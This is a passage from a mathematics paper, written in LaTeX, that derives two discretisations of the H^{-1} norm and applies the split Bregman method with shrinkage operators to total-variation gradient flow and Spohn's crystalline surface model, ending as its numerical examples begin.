= \dfrac{\mu h}{2}\|\textbf{d}-S_NR_N\textbf{u}\|_2^2.
\end{equation}
Next, we consider two expressions of $\|v_h\|_{H^{-1}_{\mathrm{av}}(\mathbb{T})}^2$ for $v_h\in V_{h0}$. Recall that equation \eqref{Lem:H-1av_norm} implies
\begin{equation}
\|v_h\|_{H^{-1}_{\mathrm{av}}(\mathbb{T})}^2 = \|\nabla(-\Delta_{\mathrm{av}})^{-1}v_h\|_{L^2(\mathbb{T})}^2.
\end{equation}
We propose two schemes for considering $\nabla(-\Delta_{\mathrm{av}})^{-1}$. The first scheme is to approximate $\nabla(-\Delta_{\mathrm{av}})^{-1}$ by using the discrete gradient $\nabla_h\in\mathbb{R}^{N\times N}$ and the discrete Laplacian
\begin{equation}
-\Delta_h = \nabla_h^{\mathrm{T}}\nabla_h = h^{-2}S_N^{\mathrm{T}}S_N = h^{-2}
\begin{pmatrix}
2&-1&0&\dots&-1\\
-1&2&-1&\dots&0\\
\vdots&&\ddots&&\vdots\\
-1&0&0&\dots&2
\end{pmatrix}\in\mathbb{R}^{N\times N}.
\end{equation}
Let $\widetilde{\textbf{v}} = (v_1,v_2,\dots, v_{N})^{\mathrm{T}}\in\mathbb{R}^N$ and $\textbf{v}=(v_1,\dots,v_{N-1})^{\mathrm{T}}\in\mathbb{R}^{N-1}$ for $v_h\in V_{h0}$, then $\widetilde{\textbf{v}}=R_N\textbf{v}$.
We define $\textbf{w}\in\mathbb{R}^{N-1}$ and $\widetilde{\textbf{w}}\in\mathbb{R}^N$ for $w_h\in V_{h0}$ in the same way. Letting $\widetilde{\textbf{v}}= -\Delta_h\widetilde{\textbf{w}}$ implies
\begin{equation}
R_N\textbf{v} = -\Delta_hR_N\textbf{w}.
\end{equation}
Multiplying the (unique) pseudo-inverse matrix
\begin{equation}
L_N = \dfrac{1}{N}\begin{pmatrix}
N-1&-1&\dots&-1&-1\\
-1&N-1&\dots&-1&-1\\
\vdots&&\ddots&&\vdots\\
-1&-1&\dots&N-1&-1
\end{pmatrix}\in\mathbb{R}^{(N-1)\times N}
\end{equation}
yields $\textbf{v} = L_N(-\Delta_h)R_N\textbf{w} = h^{-2}L_NS_N^{\mathrm{T}}S_NR_N\textbf{w}$. For simplicity of notation, we let
\begin{subequations}
\begin{align}
A_N &= L_NS_N^{\mathrm{T}}S_NR_N,\\
(-\Delta_{\mathrm{av}})_h &= h^{-2}A_N = L_N(-\Delta_h)R_N.
\end{align}
\end{subequations}
It is easy to check that
\begin{equation}
A_N = \begin{pmatrix}
3&0&1&1&\dots&1&1&1\\
-1&2&-1&0&\dots&0&0&0\\
0&-1&2&-1&\dots&0&0&0\\
\vdots&&&\ddots&&&\vdots\\
0&0&0&0&\dots&-1&2&-1\\
1&1&1&1&\dots&1&0&3
\end{pmatrix}
\in \mathbb{R}^{(N-1)\times(N-1)}.
\end{equation}
satisfies $\det A_N=N^2\neq0$, therefore we have $\det(-\Delta_{\mathrm{av}})_h^{-1} \neq0$.
This implies
\begin{equation}
\left\{\begin{array}{rl}
\widetilde{\textbf{v}} &= -\Delta_h\widetilde{\textbf{w}},\\
\widetilde{\textbf{w}}&= R_N(-\Delta_{\mathrm{av}})_h^{-1}\textbf{v}.
\end{array}\right.
\end{equation}
Our first scheme is to approximate $(-\Delta_{\mathrm{av}})^{-1}$ by $R_N(-\Delta_{\mathrm{av}})_h^{-1}$, instead of $(-\Delta_h)^{-1}$ which does not exist. This yields
\begin{equation}
\nabla(-\Delta_{\mathrm{av}})^{-1}v_h\approx(\nabla_hR_N(-\Delta_{\mathrm{av}})_h^{-1}\textbf{v})\cdot(\boldsymbol{1}_{[x_0,x_1)},\dots,\boldsymbol{1}_{[x_{N-1},x_N)})^{\mathrm{T}},
\end{equation}
that is,
\begin{align*}
\|\nabla(-\Delta_{\mathrm{av}})^{-1}v_h\|_{L^2(I)}^2 &\approx \left\|\left(\nabla_hR_N(-\Delta_{\mathrm{av}})_h^{-1}\textbf{v}\right)\cdot(\boldsymbol{1}_{[x_0,x_1)},\dots,\boldsymbol{1}_{[x_{N-1},x_N)})\right\|_{L^2(I)}^2\\
&= h\|\nabla_hR_N(-\Delta_{\mathrm{av}})_h^{-1}\textbf{v}\|_2^2\\
&= h^3\|S_NR_NA_N^{-1}\textbf{v}\|_2^2.
\end{align*}
For simplicity, we let $J = SR_NA_N^{-1}\in\mathbb{R}^{N\times(N-1)}$, then our first scheme can be described as
\begin{equation}
\label{Eq:H-1_part1}
\dfrac{\lambda}{2}\|v_h\|_{H^{-1}_{\mathrm{av}}(\mathbb{T})}^2 \approx \dfrac{\lambda h^3}{2}\|J\textbf{v}\|_2^2
\end{equation}
for all $v_h\in V_{h0}$.
\begin{remark}
When we apply $H^{-s}_{\mathrm{av}}(\mathbb{T})$ norm $(0<s<1)$ to $(\mbox{P}1)_h$, the discrete inverse Laplacian $(-\Delta_{\mathrm{av}})_h^{-s}$ can be introduced by the discrete Fourier transform (for example, see \cite{GMR19}).
\end{remark}
\begin{figure}[tb]
\centering
\includegraphics[scale=.8,clip]{plot_Bspline.pdf}
\caption{The second degree B-spline basis functions}
\label{Fig:Bspline}
\end{figure}
Our second scheme is to compute $\nabla(-\Delta_{\mathrm{av}})^{-1}$ directly. It requires the second degree piecewise polynomial which has continuous derivative. We define the second degree periodic B-spline basis functions (see Figure \ref{Fig:Bspline})
\begin{equation}
B_n(x) = \left\{\begin{array}{rl}
\dfrac{(x-x_{n-\frac{3}{2}})^2}{2h^2}&\mbox{if }x\in I_{n-1},\\
\dfrac{(x-x_{n-\frac{1}{2}})(x_{n+\frac{1}{2}}-x)}{h^2}+\dfrac{1}{2}&\mbox{if }x\in I_n,\\
\dfrac{(x_{n+\frac{3}{2}}-x)^2}{2h^2}&\mbox{if }x\in I_{n+1},\\
0&\mbox{otherwise}.
\end{array}\right.
\end{equation}
We identify $B_{-1}\equiv B_{N-1}$, $B_0\equiv B_N$ and $B_1\equiv B_{N+1}$. The B-spline basis functions have continuous derivative (see Figure \ref{Fig:Deriv_Bspline})
\begin{equation}
\nabla B_n(x) =\left\{\begin{array}{rl}
(x-x_{n-\frac{3}{2}})h^{-2}&\mbox{if }x\in I_{n-1},\\
2(x_n-x)h^{-2}&\mbox{if }x\in I_n,\\
-(x_{n+\frac{3}{2}}-x)h^{-2}&\mbox{if }x\in I_{n+1},\\
0&\mbox{otherwise}.
\end{array}\right.
\end{equation}
Therefore we have
\begin{equation}
-\Delta B_n(x) = \left\{\begin{array}{rl}
-h^{-2}&\mbox{if }x\in I_{n-1},\\
2h^{-2}&\mbox{if }x\in I_n,\\
-h^{-2}&\mbox{if }x\in I_{n+1},\\
0&\mbox{otherwise}.
\end{array}\right.
\end{equation}
Fix $v_h\in V_{h0}$ arbitrarily, then there exits $w_h\in \operatorname{span}\{B_1,\dots, B_N\}$ such that $w_h = (-\Delta_{\mathrm{av}}^{-1})v_h\in H^1_{\mathrm{av}}(\mathbb{T})$. It is easy to check that
\begin{equation}
\label{Eq:L1_Bspline}
\displaystyle\int_{\mathbb{T}}B_n(x)~dx = h\mbox{ for all }n=1,2,\dots, N.
\end{equation}
Let $\sum_{n=1}^Nw_n=0$, then equation \eqref{Eq:L1_Bspline} implies $\sum_{n=1}^Nw_nB_n\in H^1_{\mathrm{av}}(\mathbb{T})$.
Furthermore, we let
\begin{equation}
w_h = \displaystyle\sum_{n=1}^N w_nB_n\in H^1_{\mathrm{av}}(\mathbb{T}),\ \widetilde{\textbf{w}}=(w_1,\dots,w_N)^{\mathrm{T}}\in\mathbb{R}^N \mbox{ and } \textbf{w}=R_N\widetilde{\textbf{w}}\in\mathbb{R}^{N-1}.
\end{equation}
Then we have
\begin{equation}
v_h=-\Delta w_h = \displaystyle\sum_{n=1}^Nw_n (-\Delta B_n) = h^{-2}\sum_{n=1}^N(-w_{n-1}+2w_n-w_{n+1})\boldsymbol{1}_{I_n}\in V_{h0}.
\end{equation}
This implies
\begin{equation}
R_N\textbf{v}=\widetilde{\textbf{v}}= -\Delta_h\widetilde{\textbf{w}}=-\Delta_hR_N\textbf{w}=h^{-2}S_N^{\mathrm{T}}S_NR_N\textbf{w}.
\end{equation}
Multiplying the pseudo-inverse matrix $L_N$ yields
\begin{equation}
\textbf{v} =(-\Delta_{\mathrm{av}})_h\textbf{w}= h^{-2}A_N\textbf{w}.
\end{equation}
Therefore we have
\begin{equation}
\textbf{w} = (-\Delta_{\mathrm{av}})_h^{-1}\textbf{v}=h^2A_N^{-1}\textbf{v}.
\end{equation}
\begin{figure}[tb]
\centering
\includegraphics[scale=.7,clip]{plot_Bspline_deriv.pdf}
\includegraphics[scale=.7,clip]{plot_Bspline_-Lap.pdf}
\caption{The derivative of second degree B-spline basis functions.}
\label{Fig:Deriv_Bspline}
\end{figure}
The definition, combining with equation \eqref{Lem:H-1av_norm} gives $\|v_h\|_{H^{-1}_{\mathrm{av}}(\mathbb{T})}^2 = \|\nabla w_h\|_{L^2(\mathbb{T})}^2$, where
\begin{equation}
\nabla w_h = \displaystyle\sum_{n=1}^Nw_n\nabla B_n
\end{equation}
is a piecewise linear function which satisfies
\begin{equation}
\nabla w_h(x_{n-1/2}) = (w_n-w_{n-1})h^{-1}\mbox{ for all }n=1,\dots, N.
\end{equation}
This implies
\begin{equation}
\nabla w_h = \displaystyle\sum_{n=1}^N(w_n-w_{n-1})h^{-1}\phi_{n-1/2} = (\nabla_h\widetilde{\textbf{w}})\cdot(\phi_{1/2},\dots,\phi_{N-1/2})^{\mathrm{T}},
\end{equation}
where
\begin{equation}
\phi_{n-1/2}(x) = \left\{\begin{array}{rl}
(x-x_{n-3/2})h^{-1}&\mbox{if }x\in I_{n-1},\\
(x_{n+1/2}-x)h^{-1}&\mbox{if }x\in I_n,\\
0&\mbox{otherwise}.
\end{array}\right.
\end{equation}
We identify $\phi_{-1/2}=\phi_{N-1/2}$, $\phi_{1/2}=\phi_{N+1/2}$ (see Figure \ref{Fig:tent}). It is easy to check that
\begin{equation}
\displaystyle\int_{\mathbb{T}}\phi_{n-1/2}(x)\phi_{m-1/2}(x)~dx = \left\{
\begin{array}{rl}
2h/3&\mbox{if }n=m,\\
h/6&\mbox{if }|n-m|=1,\\
0&\mbox{otherwise}
\end{array}\right.\label{Eq:mass_mat_phi}
\end{equation}
for all $n=1,\dots,N$. Therefore we have
\begin{align*}
\|v_h\|_{H^{-1}_{\mathrm{av}}(\mathbb{T})}^2 &= \|\nabla w_h\|_{L^2(\mathbb{T})}^2\\
&= (\nabla_h\widetilde{\textbf{w}})^{\mathrm{T}}\begin{pmatrix}
2h/3&h/6&0&\dots&0&h/6\\
h/6&2h/3&h/6&\dots&0&0\\
\vdots&&\ddots&&&\vdots\\
h/6&0&0&\dots&h/6&2h/3
\end{pmatrix}\nabla_h\widetilde{\textbf{w}}\\
&= \dfrac{1}{h}(S_NR_N\textbf{w})^{\mathrm{T}}M_NS_NR_N\textbf{w},
\end{align*}
where
\begin{equation}
M_N = \begin{pmatrix}
2/3&1/6&0&\dots&0&1/6\\
1/6&2/3&1/6&\dots&0&0\\
\vdots&&\ddots&&&\vdots\\
1/6&0&0&\dots&1/6&2/3
\end{pmatrix}\in\mathbb{R}^{N\times N}.
\end{equation}
Let
\begin{equation}
T=\begin{pmatrix}
a&0&\dots&0&b\\
b&a&\dots&0&0\\
\vdots&&\ddots&&\\
0&0&\dots&b&a\\
\end{pmatrix}\in\mathbb{R}^{N\times N},
\end{equation}
where $a=\dfrac{\sqrt{3}+1}{2\sqrt{3}}$ and $b = \dfrac{\sqrt{3}-1}{2\sqrt{3}}$, then $T^{\mathrm{T}}T=M_N$. Summarizing the above argument, our second scheme can be described as
\begin{align*}
\dfrac{\lambda}{2}\|v_h\|_{H^{-1}_{\mathrm{av}}(\mathbb{T})}^2 &= \dfrac{\lambda}{2h}(S_NR_N\textbf{w})^{\mathrm{T}}M_NS_NR_N\textbf{w}\\
&= \dfrac{\lambda}{2h}(S_NR_N(-\Delta_{\mathrm{av}})_h^{-1}\textbf{v})^{\mathrm{T}}T^{\mathrm{T}}TS_NR_N(-\Delta_{\mathrm{av}})_h^{-1}\textbf{v}\\
&=\dfrac{\lambda h^3}{2}\|TS_NR_NA_N^{-1}\textbf{v}\|_2^2.
\end{align*}
Let $H = TSR_NA_N^{-1} = TJ\in\mathbb{R}^{N\times (N-1)}$ for simplicity of notation, then we have
\begin{equation}
\label{Eq:H-1_part2}
\dfrac{\lambda}{2}\|v_h\|_{H^{-1}_{\mathrm{av}}(\mathbb{T})}^2 = \dfrac{\lambda h^3}{2}\|H\textbf{v}\|_2^2.
\end{equation}
Applying equation \eqref{Eq:L2_part}, \eqref{Eq:H-1_part1} and \eqref{Eq:H-1_part2} to $(\mbox{P}2)_h$ implies the following two discretized problems;
\begin{subequations}
\begin{align}
&\displaystyle\mathop{\mathrm{minimize}}_{\textbf{u}\in\mathbb{R}^{N-1}, \textbf{d}\in\mathbb{R}^N}\left\{\|\textbf{d}\|_1+\dfrac{\lambda h^3}{2}\|J(\textbf{u}-\textbf{f})\|_2^2+\dfrac{\mu h}{2}\|\textbf{d}-S_NR_N\textbf{u}\|_2^2\right\},\label{Scheme:SB1}\\
&\displaystyle\mathop{\mathrm{minimize}}_{\textbf{u}\in\mathbb{R}^{N-1}, \textbf{d}\in\mathbb{R}^N}\left\{\|\textbf{d}\|_1+\dfrac{\lambda h^3}{2}\|H(\textbf{u}-\textbf{f})\|_2^2+\dfrac{\mu h}{2}\|\textbf{d}-S_NR_N\textbf{u}\|_2^2\right\}\label{Scheme:SB2},
\end{align}
\end{subequations}
where $\textbf{f}\in\mathbb{R}^{N-1}$ is given as $f\in V_{h0}$ or $\textbf{f} = \textbf{u}^k$. Recall that the matrix $J$ is introduced by the approximation $\nabla(-\Delta_{\mathrm{av}})^{-1}\approx \nabla_hR_N(-\Delta_{\mathrm{av}})_h^{-1}$. On the other hand, we obtain $H$ by using $\nabla(-\Delta_{\mathrm{av}})^{-1}$ exactly. Therefore \eqref{Scheme:SB1} can be regarded as an approximation of \eqref{Scheme:SB2}, which is equivalent to $(\mbox{P}2)_h$.
\begin{figure}[tb]
\centering
\includegraphics[scale=.8]{plot_tent.pdf}
\caption{The piecewise linear basis functions}
\label{Fig:tent}
\end{figure}
\section{Split Bregman framework}
\label{Sec:SplitBregman}
In this section, we review the alternating split Bregman framework in \cite{GO09} for the problem
\begin{equation}
\label{Prob:Generalized}
(\mbox{P}3K)_h\quad \displaystyle\mathop{\mathrm{minimize}}_{\textbf{u}\in\mathbb{R}^{N-1}, \textbf{d}\in\mathbb{R}^N}\left\{\|\textbf{d}\|_1+\dfrac{\lambda h^3}{2}\|K(\textbf{u}-\textbf{f})\|_2^2+\dfrac{\mu h}{2}\|\textbf{d}-S_NR_N\textbf{u}\|_2^2\right\},
\end{equation}
where $K\in\mathbb{R}^{N\times(N-1)}$ is equal to $J$ or $H$. Recall that $(\mbox{P}3K)_h$ is an approximation of the discrete problem for $(\mbox{P}0)$;
\begin{equation}
(\mbox{P}0K)_h\quad \displaystyle\mathop{\mathrm{minimize}}_{\textbf{u}\in\mathbb{R}^{N-1}}\left\{\|S_NR_N\textbf{u}\|_1+\dfrac{\lambda h^3}{2}\|K(\textbf{u}-\textbf{f})\|_2^2\right\}.
\end{equation}
Let
\begin{equation}
\Psi(\textbf{u},\textbf{d}) = \|\textbf{d}\|_1+\dfrac{\lambda h^3}{2}\|K(\textbf{u}-\textbf{f})\|_2.
\end{equation}
The Bregman method replaces $\Psi(\textbf{u},\textbf{d})$ into the Bregman distance and iteratively solves
\begin{equation}
\label{Eq:Bregman}
(\textbf{u}^{k+1},\textbf{d}^{k+1}) = \displaystyle\mathop{\mathrm{argmin}}_{\textbf{u}\in\mathbb{R}^{N-1}, \textbf{d}\in\mathbb{R}^N}\left\{D_{\Psi}^{\textbf{p}^k}((\textbf{u},\textbf{d}),(\textbf{u}^k,\textbf{d}^k)) + \dfrac{\mu h}{2}\|\textbf{d}-S_NR_N\textbf{u}\|_2^2\right\},
\end{equation}
where the Bregman distance $D_{\Psi}^{\textbf{p}^k}$ is defined as
\begin{equation}
D_{\Psi}^{\textbf{p}^k}((\textbf{u},\textbf{d}),(\textbf{u}^k,\textbf{d}^k)) = \Psi(\textbf{u},\textbf{d}) - \Psi(\textbf{u}^k,\textbf{d}^k)-\textbf{p}_u^k\cdot(\textbf{u}-\textbf{u}^k)-\textbf{p}_d^k\cdot(\textbf{d}-\textbf{d}^k),
\end{equation}
and $\textbf{p}^k = (\textbf{p}_u^k,\textbf{p}_d^k)\in \mathbb{R}^{N-1}\times\mathbb{R}^N$ is defined as
\begin{subequations}
\begin{align}
\textbf{p}_u^{k+1} &= \textbf{p}_u^k - \mu h(S_NR_N)^{\mathrm{T}}(S_NR_N\textbf{u}^{k+1}-\textbf{d}^{k+1})\mbox{ and }\textbf{p}_u^0 =\textbf{0}\in\mathbb{R}^{N-1}\\
\textbf{p}_d^{k+1} &= \textbf{p}_d^k - \mu h(\textbf{d}^{k+1}-S_NR_N\textbf{u}^{k+1})\mbox{ and }\textbf{p}_d^0=\textbf{0}\in\mathbb{R}^N.
\end{align}
\end{subequations}
Thanks to $\Psi:\mathbb{R}^{N-1}\times\mathbb{R}^N\to\mathbb{R}$ is convex and lower semi-continuous, the Bregman distance $D_{\Psi}^{\textbf{p}^k}(\cdot,(\textbf{u}^k,\textbf{d}^k))$ is also convex and lower semi-continuous. Applying the usual existence result of convex analysis (see \cite[Cor3.23]{Bre11}) gives that there exists a minimizer $(\textbf{u}^{k+1},\textbf{d}^{k+1})$. Furthermore, by using induction we can show that
\begin{equation}
\left(\Psi(\textbf{u},\textbf{d}) +\dfrac{\mu h}{2}\|\textbf{d}-S_NR_N\textbf{u}-\boldsymbol{\alpha}^{k}\|_2^2\right) - \left(D_{\Psi}^{\textbf{p}^k}((\textbf{u},\textbf{d}),(\textbf{u}^k,\textbf{d}^k)) + \dfrac{\mu h}{2}\|\textbf{d}-S_NR_N\textbf{u}\|_2^2\right)
\end{equation}
is independent of $(\textbf{u},\textbf{d})$, where $\boldsymbol{\alpha}^{k+1}\in\mathbb{R}^N$ is defined as
\begin{equation}
\boldsymbol{\alpha}^{k+1} = \boldsymbol{\alpha}^k -(\textbf{d}^{k+1}-S_NR_N\textbf{u}^{k+1})\mbox{ and }\boldsymbol{\alpha}^{0}=\textbf{0}.
\end{equation}
This implies the minimizer $(\textbf{u}^{k+1},\textbf{d}^{k+1})$ of problem \eqref{Eq:Bregman} satisfies
\begin{equation}
(\textbf{u}^{k+1},\textbf{d}^{k+1}) = \displaystyle\mathop{\mathrm{argmin}}_{\textbf{u}\in\mathbb{R}^{N-1}, \textbf{d}\in\mathbb{R}^N}\left\{\|\textbf{d}\|_1+\dfrac{\lambda h^3}{2}\|K(\textbf{u}-\textbf{f})\|_2^2+\dfrac{\mu h}{2}\|\textbf{d}-S_NR_N\textbf{u}-\boldsymbol{\alpha}^{k}\|_2^2\right\}.
\end{equation}
This is the split Bregman iteration for the problem $(\mbox{P}3K)_h$.
Finally, we apply the alternating split Bregman algorithm and obtain
\begin{subequations}
\begin{empheq}[left=(\mbox{P}4K)_h\quad\empheqlbrace]{align}
\textbf{u}^{k+1} &= \displaystyle\mathop{\mathrm{argmin}}_{\textbf{u}\in\mathbb{R}^{N-1}}\left\{\dfrac{\lambda h^3}{2}\|K(\textbf{u}-\textbf{f})\|_2^2 + \dfrac{\mu h}{2}\|\textbf{d}^k-S_NR_N\textbf{u}-\boldsymbol{\alpha}^{k}\|_2^2\right\},\label{Eq:P4h2}\\
\textbf{d}^{k+1} &= \displaystyle\mathop{\mathrm{argmin}}_{\textbf{d}\in\mathbb{R}^N}\left\{\|\textbf{d}\|_1+\dfrac{\mu h}{2}\|\textbf{d}-S_NR_N\textbf{u}^{k+1}-\boldsymbol{\alpha}^{k}\|_2^2\right\}\label{Eq:P4h3},\\
\boldsymbol{\alpha}^{k+1} &= \boldsymbol{\alpha}^k-\textbf{d}^{k+1}+S_NR_N\textbf{u}^{k+1},
\end{empheq}
\end{subequations}
where $\textbf{f}\in\mathbb{R}^{N-1}$ is given data or $\textbf{f}=\textbf{u}^k$, $\boldsymbol{\alpha}^0 = \textbf{0}$, $\textbf{u}^0$ is given as $\textbf{0}$ or initial condition, and $\textbf{d}^0 = S_NR_N\textbf{u}^0$. This satisfies the following convergence result.
\begin{lemma}[Theorem 3.2 of \cite{COS10}]
Suppose that $(\mbox{P}0K)_h$ has a minimizer $\textbf{u}^*\in\mathbb{R}^{N-1}$, then $\textbf{u}^k$ which determined by $(\mbox{P}4K)_h$ satisfies
\begin{equation}
\lim_{k\to\infty}\|S_NR_N\textbf{u}^{k+1}\|_1 + \dfrac{\lambda h^3}{2}\|K(\textbf{u}^{k+1}-\textbf{f})\|_2^2 = \|S_NR_N\textbf{u}^*\|_1 + \dfrac{\lambda h^3}{2}\|K(\textbf{u}^*-\textbf{f})\|_2^2.
\end{equation}
Furthermore, if a minimizer $\textbf{u}^*$ of $(\mbox{P}0K)_h$ is unique, then $\lim_{k\to\infty}\|\textbf{u}^{k+1}-\textbf{u}^*\|_2=0$.
\end{lemma}
The functional in \eqref{Eq:P4h2} is differentiable with respect to $\textbf{u}$, and the minimization \eqref{Eq:P4h3} can be reduced to the shrinking method
\begin{equation}
(\textbf{d}^{k+1})_n = \operatorname{shrink}\left((S_NR_N\textbf{u}^{k+1}+\boldsymbol{\alpha}^{k})_n,\dfrac{1}{\mu h}\right),
\end{equation}
where $(\textbf{v})_n$ is the $n$-entry of vector $\textbf{v}$ and
\begin{equation}
\label{Op:shrink}
\operatorname{shrink}(\rho,a) = \dfrac{\rho}{|\rho|}\max\{|\rho|-a,0\}.
\end{equation}
Therefore, the problem $(\mbox{P}4K)_h$ introduces
\begin{equation*}
(\mbox{P}5K)_h\quad \left\{\begin{array}{rl}
\textbf{u}^{k+1} &= \left(\lambda h^3K^{\mathrm{T}}K+\mu h(S_NR_N)^{\mathrm{T}}S_NR_N\right)^{-1}\left(\lambda h^3K^{\mathrm{T}}K\textbf{f}+\mu h(S_NR_N)^{\mathrm{T}}(\textbf{d}^k-\boldsymbol{\alpha}^{k})\right),\\
(\textbf{d}^{k+1})_n &= \operatorname{shrink}\left((S_NR_N\textbf{u}^{k+1}+\boldsymbol{\alpha}^{k})_n,\dfrac{1}{\mu h}\right)\mbox{ for all }n=1,\dots, N,\\
\boldsymbol{\alpha}^{k+1} &= \boldsymbol{\alpha}^k-\textbf{d}^{k+1}+S_NR_N\textbf{u}^{k+1},
\end{array}\right.
\end{equation*}
where $\textbf{f}\in\mathbb{R}^{N-1}$ is given data or $\textbf{f}=\textbf{u}^k$, $\boldsymbol{\alpha}^0 = \textbf{0}$, $\textbf{u}^0$ is given as $\textbf{0}$ or initial condition, and $\textbf{d}^0 = S_NR_N\textbf{u}^0$.
\begin{figure}[tb]
\centering
\includegraphics[clip]{plot_num_example3.pdf}
\caption{The difference between $K=J$ and $K=H$.}
\label{Fig:example3}
\end{figure}
\section{Shrinking method for Spohn's model}
\label{Sec:Spohn}
In this section, we consider the split Bregman framework for Spohn's model
\begin{equation}
u_t = -\Delta\left(\operatorname{div}\left(\beta\dfrac{\nabla u}{|\nabla u|}+|\nabla u|^{p-2}\nabla u\right)\right),
\end{equation}
which can be regarded as the gradient flow problem for energy functional
\begin{equation}
\widetilde{\Phi}(u) = \beta\displaystyle\int_{\mathbb{T}}|Du| + \dfrac{1}{p}\int_{\mathbb{T}}|Du|^p,
\end{equation}
where $\beta>0$ and $p>1$. This energy is considered in model for the relaxation of a crystalline surface below the roughening temperature (for example, see \cite{KV10}). If we replace $w = (Du)^p$, the alternating split Bregman method introduces nonlinear problem. In this paper we always assume $p=3$, and we apply the constraint $d=Du$ to $|Du|^3$. The alternating split Bregman method implies
\begin{subequations}
\begin{empheq}[left=\empheqlbrace]{align}
\textbf{u}^{k+1} &= \displaystyle\mathop{\mathrm{argmin}}_{\textbf{u}\in\mathbb{R}^{N-1}}\left\{\dfrac{\lambda h^3}{2}\|K(\textbf{u}-\textbf{f})\|_2^2 + \dfrac{\mu h}{2}\|\textbf{d}^k-S_NR_N\textbf{u}-\boldsymbol{\alpha}^{k}\|_2^2\right\},\\
\textbf{d}^{k+1} &= \displaystyle\mathop{\mathrm{argmin}}_{\textbf{d}\in\mathbb{R}^N}\left\{\beta\|\textbf{d}\|_1+ \dfrac{1}{p}\|\textbf{d}\|_p^p +\dfrac{\mu h}{2}\|\textbf{d}-S_NR_N\textbf{u}^{k+1}-\boldsymbol{\alpha}^{k}\|_2^2\right\}\label{Eq:Crystalline_energy},\\
\boldsymbol{\alpha}^{k+1} &= \boldsymbol{\alpha}^k-\textbf{d}^{k+1}+S_NR_N\textbf{u}^{k+1},
\end{empheq}
\end{subequations}
We consider the Euler-Lagrange equation for equation \eqref{Eq:Crystalline_energy};
\begin{equation}
\beta\left(\dfrac{(\textbf{d}^{k+1})_n}{|(\textbf{d}^{k+1})_n|}\right)_{1\le n\le N} + \left((\textbf{d}^{k+1})_n|(\textbf{d}^{k+1})_n|^{p-2}\right)_{1\le n\le N} +\mu h(\textbf{d}^{k+1}-SR_N\textbf{u}^{k+1}-\boldsymbol{\alpha}^k)=0.
\end{equation}
For simplicity of notation, we let $x=(\textbf{d}^{k+1})_n$, $a=1/(\mu h)>0$ and $\rho = (SR_N\textbf{u}^{k+1}+\boldsymbol{\alpha}^k)_n$. This, combining with $p=3$ gives
\begin{equation}
\beta\dfrac{x}{|x|}+x|x|+\dfrac{1}{a}(x-\rho)=0.
\end{equation}
Suppose that $x>0$, then we have $a\beta<\rho$ and
\begin{equation}
x=\dfrac{1}{2}\left(-\dfrac{1}{a}+\sqrt{\dfrac{1}{a^2}-4\left(\beta-\dfrac{\rho}{a}\right)}\right).
\end{equation}
By the similar way, supposing $x<0$ yields $\rho<-a\beta$ and
\begin{equation}
x = \dfrac{1}{2}\left(\dfrac{1}{a}-\sqrt{\dfrac{1}{a^2}-4\left(\beta+\dfrac{\rho}{a}\right)}\right).
\end{equation}
If $-a\beta<\rho<a\beta$, we let $x=0$. These observations provide the shrinking operator of the form
\begin{equation}
\label{Eq:Shrink_for_Spohn}
x = \dfrac{\rho}{2a|\rho|}\left(-1+\sqrt{1+4a\max\{|\rho|-a\beta,0\}}\right).
\end{equation}
Applying this to equation \eqref{Eq:Crystalline_energy} gives
\begin{equation*}
\left\{\begin{array}{rl}
\textbf{u}^{k+1} &= \left(\lambda h^3K^{\mathrm{T}}K+\mu h(S_NR_N)^{\mathrm{T}}S_NR_N\right)^{-1}\left(\lambda h^3K^{\mathrm{T}}K\textbf{f}+\mu h(S_NR_N)^{\mathrm{T}}(\textbf{d}^k-\boldsymbol{\alpha}^{k})\right),\\
(\textbf{d}^{k+1})_n &=\dfrac{\mu h\rho_n^{k+1}}{2|\rho_n^{k+1}|}\left(-1+\sqrt{1+\dfrac{4}{\mu h}\max\left\{|\rho_n^{k+1}|-\dfrac{\beta}{\mu h},0\right\}}\right) \mbox{ for all }n=1,\dots, N,\\
\boldsymbol{\alpha}^{k+1} &= \boldsymbol{\alpha}^k-\textbf{d}^{k+1}+S_NR_N\textbf{u}^{k+1},
\end{array}\right.
\end{equation*}
where $\rho_n^{k+1}=(S_NR_N\textbf{u}^{k+1}+\boldsymbol{\alpha}^k)_n$.
\begin{figure}[tb]
\centering
\subfloat[][$K=J$]{\includegraphics[clip,scale=.7]{plot_num_example1J.pdf}\label{Fig:K=J}}
\subfloat[][$K=H$]{\includegraphics[clip,scale=.7]{plot_num_example1H.pdf}\label{Fig:K=H}}
\caption{Numerical examples of the gradient flow.}
\label{Fig:gradient_flow}
\end{figure}
\section{Numerical example}
\label{Sec:NumExample}
\subsection{Example 1: Comparison of two schemes}
Here we show numerical examples of $(\mbox{P}5K)_h$. Note that equation \eqref{Eq:P4h3} implies that $\mu$ should satisfy $\mu=O(h^{-1})$. Moreover, this and equation \eqref{Eq:P4h2} yield $\lambda = O(h^{-3})$ is necessary for reasonable computation.
In this paper, we always regard $\mathbb{T}$ as an interval $[0,1]$ with periodic boundary condition.
Our first numerical example is the gradient flow \eqref{Eq:GradientFlow} with the initial condition
\begin{equation}
u^0(x) = \left\{\begin{array}{ll}
10(4-\log5)&\mbox{if }|x-1/2|\le 1/10,\\
\dfrac{5}{|x-1/2|}-10(1+\log5)&\mbox{otherwise.}
\end{array}\right.
\end{equation}
Note that the similar example is computed in \cite{GMR19}. They essentially apply the matrix $J$ and compute the gradient flow problem without split Bregman method. Their scheme requires $\tau = \lambda^{-1} = O(h^5)$ for $H^{-1}_{\mathrm{av}}$ fidelity.
We check the difference between $K=J$ and $K=H$. Figure \ref{Fig:example3} shows two numerical results with the same parameters $N=40$, $\lambda=h^{-3}$ and $\mu=5h^{-1}$.
Numerical results $\textbf{u}^k\in\mathbb{R}^{N-1}$ are represented as piecewise constant functions $u_h^k\in V_{h0}$.
They are different because the matrix $J$ is introduced by discrete gradient and discrete inverse Laplacian. This difference is expected to be small if we consider sufficiently small $h$.
Figure \ref{Fig:gradient_flow} shows evolution of numerical solutions for $N=200$, $\lambda=h^{-3}$ and $\mu=5h^{-1}$. We infer from them that \eqref{Scheme:SB1} can provide sufficiently accurate result.
\subsection{Example 2: Discontinuity and symmetry}
Our second numerical example for \eqref{Eq:GradientFlow} is
\begin{equation}
\label{Eq:initial_data}
u^0(x) = \left\{\begin{array}{ll}
-a(1/4-r)^3&\mbox{if }0<x<r\mbox{ or }1-r<x<1,\\
a(x-1/4)^3&\mbox{if }r<x<1/2-r,\\
a(1/4-r)^3&\mbox{if }1/2-r<x<1/2+r\\
-a(x-3/4)^3&\mbox{if }1/2+r<x<1-r,
\end{array}\right.
\end{equation}
